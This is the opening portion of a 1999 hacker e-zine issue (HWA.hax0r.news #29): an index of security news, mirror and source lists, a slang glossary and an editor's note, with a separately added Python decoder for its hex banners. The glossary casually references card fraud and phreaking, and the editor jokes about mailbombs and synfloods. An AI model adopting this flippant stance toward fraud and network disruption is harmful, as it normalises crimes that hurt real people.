[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
[=HWA'99=] Number 29 Volume 1 1999 Aug 14th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Paraphrased irc nonsense I found amusing;

[16:00] *** Quits: wyze1 (Of course my password is my pet's name! My parrot's
                          name was XzF!^lP, but I changed it to polly)

New mirror sites

http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

For many, faith is a suitable substitute for knowledge, as death is for a
difficult life.
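The bracketed hex banners in the header are plain ASCII bytes written out in hex. Here is a small decoder, added here as an example and not part of the zine, that handles the two notations the header uses (space-separated byte pairs, and colon-separated byte pairs where a trailing non-hex token such as "!" is a literal character); the banner strings below are copied from the header above.

```python
# Added example (not part of the zine): decode the hex banners printed at
# the top of the issue. Two notations appear on the page: space-separated
# byte pairs, and colon-separated byte pairs where a trailing non-hex token
# ("!") is a literal character rather than a hex value.
import re

# Banner text copied from the issue header (the bracketed blocks).
BANNERS = [
    "[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]",
    "[ 61:20:6B:69:64:20:63:6F:75: ]",
    "[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]",
    "[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]",
]

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")


def decode_banner(line):
    """Decode one bracketed banner line into text.

    Tokens are split on spaces or colons. A token that is exactly two hex
    digits is treated as one byte; any other non-empty token (e.g. "!") is
    kept verbatim, which is how the last banner ends its sentence.
    """
    body = line.strip().strip("[]")
    out = []
    for tok in re.split(r"[ :]+", body):
        if not tok:
            continue
        if HEX_PAIR.match(tok):
            out.append(chr(int(tok, 16)))
        else:
            out.append(tok)
    return "".join(out)


def decode_all(banners=BANNERS):
    """Decode every banner line separately."""
    return [decode_banner(b) for b in banners]


def joined_message(banners=BANNERS):
    """The three colon-separated banners spell one sentence across lines."""
    return "".join(decode_banner(b) for b in banners[1:])


if __name__ == "__main__":
    for text in decode_all():
        print(repr(text))
    print(joined_message())
```

The first banner is the copyright line and the three colon-separated banners together form one sentence; run the file directly to see both.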
SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour of
love and will be continued for as long as I feel like it, i'm not motivated
by dollars or the illusion of fame, did you ever notice how the most
famous/infamous hackers are the ones that get caught? there's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                    Welcome to HWA.hax0r.news ... #29
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'             ***
***                                                               ***
***  please join to discuss or impart news on techno/phac scene   ***
***  stuff or just to hang out ... someone is usually around 24/7 ***
***                                                               ***
***  Note that the channel isn't there to entertain you its for   ***
***  you to talk to us and impart news, if you're looking for fun ***
***  then do NOT join our channel try #weirdwigs or something...  ***
***  we're not #chatzone or #hack                                 ***
***                                                               ***
*******************************************************************

=--------------------------------------------------------------------------=
                                Issue #29
=--------------------------------------------------------------------------=
                                [ INDEX ]
=--------------------------------------------------------------------------=
     Key     Intros
=--------------------------------------------------------------------------=

     00.0 .. COPYRIGHTS ......................................................
     00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
     00.2 .. SOURCES .........................................................
     00.3 .. THIS IS WHO WE ARE ..............................................
     00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
     00.5 .. THE HWA_FAQ V1.0 ................................................

=--------------------------------------------------------------------------=
     Key     Content
=--------------------------------------------------------------------------=

     01.0 .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
     02.0 .. From the Editor..................................................
     03.0 .. So you wanna be a hacker? by Avatar..............................
     04.0 .. Microsoft vulnerability bulletin: Encapsulated SMTP address......
     05.0 .. Disrupting Net Access a Cybercrime? .............................
     06.0 .. IDEA CAST BO2K PLUGIN VULNERABILITY..............................
     07.0 .. Mitnick gets a welcome birthday present from the LA DA...........
     08.0 .. An Accurate Look At Mitnick's Life Behind Bars ..................
     09.0 .. Sony and EA Take Down Paradigm ..................................
     10.0 .. Regional Computer Forensics Lab Set Up in San Diego .............
     11.0 .. University Sys Admin Faced with 10 Years for Using Too Much Bandwidth
     12.0 .. Chaos Computer Camp Fun For All Last Weekend ....................
     13.0 .. NIST Announces the AES Finalist Candidates ......................
     14.0 .. Clinton Designates Group to Look At CyberCrime ..................
     15.0 .. Taiwan Government Web Sites Defaced .............................
     16.0 .. DoD Ordered to Change All Passwords .............................
     17.0 .. Belgians Under Cyber Attack From One Man ........................
     18.0 .. IRDP Hole in Win and Sol Leave Users Open to Attack..............
     19.0 .. More Government Sites Defaced ...................................
     20.0 .. Taiwan Strikes back at China via Net ............................
     21.0 .. Monopoly Virus Taunts Bill Gates and Microsoft ..................
     22.0 .. FBI Fingerprint database now online..............................
     23.0 .. 45 Named as Enemies of the Internet .............................
     24.0 .. Alliance Z3 Defaces Spanish Web Site ............................
     25.0 .. Government has a Hard Time with Bureaucracy .....................
     26.0 .. Law Not a Substitute for Good Security ..........................
     27.0 .. Network-centric Warfare to be Used by Military ..................
     28.0 .. Gateway plans for Amiga .........................................
     29.0 .. Mitnick Moved to County Jail ....................................
     30.0 .. The problem with ISP's and security sites........................
     31.0 .. The Internet Auditing Project ...................................
     32.0 .. TCS Web Page Defacer Pleads Guilty ..............................
     33.0 .. Cybercrime On the Rise in Russia - First Offender Convicted .....
     34.0 .. ToorCon Less Than One Month Away ................................
     35.0 .. FRESHMEAT.NET BOUGHT.............................................
     36.0 .. LINUXPPC CRACK-CONTEST FINISHED..................................
     37.0 .. INFOSEEK HACKED..................................................
     38.0 .. HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL...............
     39.0 .. TRINUX 0.62 RELEASED.............................................
     40.0 .. GOVERNMENT FACES SECURITY SKILLS SHORTAGE........................
     41.0 .. SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA................
     42.0 .. IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD.................
     43.0 .. ISRAEL AND PIRACY................................................
     44.0 .. OUTSIDE HELP ISN'T WANTED .......................................
     45.0 .. HACKER MYTHOLOGY.................................................
     46.0 .. DEFAULT ISSUE #1.................................................
     47.0 .. MICROSOFT AND AOL................................................
     48.0 .. INTERVIEW WITH ERIC RAYMOND......................................
     49.0 .. CODE-CRACKING COMPUTER CAUSES CONCERN............................
     50.0 .. HACKING YOUR WAY TO AN IT CAREER.................................
     51.0 .. BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML...........
     52.0 .. STARTUP WANTS TO SELL UNTAPPABLE PHONES..........................
     53.0 .. OUTSMARTING THE WILY COMPUTER VIRUS..............................
     54.0 .. NEW MAIL ATTACK IDENTIFIED.......................................
     55.0 .. ERROR IN MICROSOFT PATCH.........................................
     56.0 .. NEW IE5 BUG EXPOSES PASSWORDS....................................
     57.0 .. KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA..................
     58.0 .. L0PHT IRDP ADVISORY..............................................
     59.0 .. Stronger computers, easier encryption, RSA coding................
     60.0 .. 'Security Police isn't doing enough'.............................
     61.0 .. Hack attacks drive outsourced security...........................
     62.0 .. Backdoors in Windows?............................................
     63.0 .. The newbies guide to FUD (Fear Uncertainty and Doubt)............
     64.0 .. Crashing AntiOnline's SMTP server?...............................
     65.0 .. Rootshell.com review.............................................
     66.0 .. The inevitability of failure.....................................

=--------------------------------------------------------------------------=

     AD.S .. Post your site ads or etc here, if you can offer something in
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in. ads for other zines are ok too btw just mention us
             in yours, please remember to include links and an email contact.
             Corporate ads will be considered also and if your company wishes
             to donate to or participate in the upcoming Canc0n99 event send
             in your suggestions and ads now...n.b date and time may be pushed
             back join mailing list for up to date information..............
             Current dates: POSTPONED til further notice, place: TBA.........

     Ha.Ha .. Humour and puzzles ............................................
              Hey You!.......................................................
              =------=.......................................................
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)..........................................

     SITE.1 .. Featured site, ...............................................
     H.W .. Hacked Websites .................................................
     A.0 .. APPENDICES.......................................................
     A.1 .. PHACVW linx and references.......................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT?
V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT
NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal
and send a poor guy a postcard preferably one that has some scenery from
your place of residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard, return
address not necessary, just a "hey guys being cool in Bahrain, take it
easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc................. http://www.cultdeadcow.com/
News site (HNN) ................. http://www.hackernews.com/
Help Net Security................ http://net-security.org/
News,Advisories,++ .(lophtcrack). http://www.l0pht.com/
NewsTrolls .(daily news )........ http://www.newstrolls.com/
News + Exploit archive .......... http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest.. http://www.soci.niu.edu/~cudigest
News site+....................... http://www.zdnet.com/
News site+Security............... http://www.gammaforce.org/
News site+Security............... http://www.projectgamma.com/
News site+Security............... http://securityhole.8m.com/
News site+Security related site.. http://www.403-security.org/ *DOWN*
News/Humour site+ ............... http://www.innerpulse.com
News/Techie news site............ http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/ ........ Electronic Underground Affiliation
http://ech0.cjb.net ............... ech0 Security
http://axon.jccc.net/hir/ ......... Hackers Information Report
http://net-security.org ........... Net Security
http://www.403-security.org ....... Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or not
and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body "subscribe bugtraq".
I've been archiving this list on the web since late 1993. It is searchable
with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that reproduction
of those words without your permission in any medium outside the
distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...(   ''   ''    ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also
if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it
will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you
   count paying taxes ... in which case we work for the gov't in a BIG
   WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events its a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have
to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS
anymore. BTW to all you up and comers, i'd highly recommend you get that
book. Its almost like buying a clue. Anyway..on with the show ..

- Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't
be reprinted unless changed in a big way with the exception of the
following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If
           written as =/= (equals sign with a slash thru it) also means
           !=, =< is Equal to or less than and => is equal to or greater
           than (etc, this aint fucking grade school, cripes, don't
           believe I just typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18
           or <21)

AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses
           through, we're not talking Kung-Fu being none too good here,
           Buy-A-Kloo maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
           hacker speak he's the guy that breaks into systems and is often
           (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip,
           I like jalapeno pepper dip or chives sour cream and onion, yum
           - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak
           using ebonics, speaking in a dark tongue ... being ereet, see
           pheer

EoC      - End of Commentary
EoA      - End of Article or more commonly @HWA
EoF      - End of file
EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty
           and doubt", usually in general media articles not high brow
           articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
           is difficult to define, I think it is best defined as pop
           culture's view on The Hacker ala movies such as well erhm
           "Hackers" and The Net etc... usually used by "real" hackers or
           crackers in a derogatory or slang humorous way, like 'hax0r me
           some coffee?' or 'can you hax0r some bread on the way to the
           table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN ..
           and HNN as a proper noun means the hackernews site proper.
           k? k.

HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin' way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare
           Alternates: H  - hacking, hacktivist
                       C  - Cracking
                       C  - Cracking
                       V  - Virus
                       W  - Warfare
                       A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P  - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in
           the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, noone can say this without
           severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
           shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like
to see more reader input, help me out here, whats good, what sucks etc, not
that I guarantee i'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support

FProphet  Pyra  TwstdPair  _NeM_  D----Y  Dicentra  vexxation  sAs72
Spikeman  p0lix

Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

& Kevin Mitnick (Happy Birthday)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others
from whatever sources, also to Spikeman for sending in past entries....
- Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");

    /* Thin pickings this week for news, but here we go with #29
     *
     *
     * Remember to send in any articles you want to write to us!
     * whether its technology, hacking, internet, or phreaking...
     * also poetry and short cyberpunk stories will be considered
     * for printing, use us as your distribution medium...
     *
     * send submissions to: hwa@press.usmc.net
     */

    printf("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs
can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private
mail to cruciphux@dok.org

danke.

C*:.

03.0 So you wanna be a hacker? by Avatar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

retro-text picked up off the web by - ed ...

http://dmatrix.teamshadow.com/hack/statemind.txt

So you wanna be a HACKER huh? It's a state-of-MIND! ..you can induce it -
but only if you are willing to drive yourself mad enough! Go read and
practice until you have mastered at least Assembly language and
Intermediate Level Electronics! Without this foundation you'll be just
another little geek, who might know the magic words to the spell but
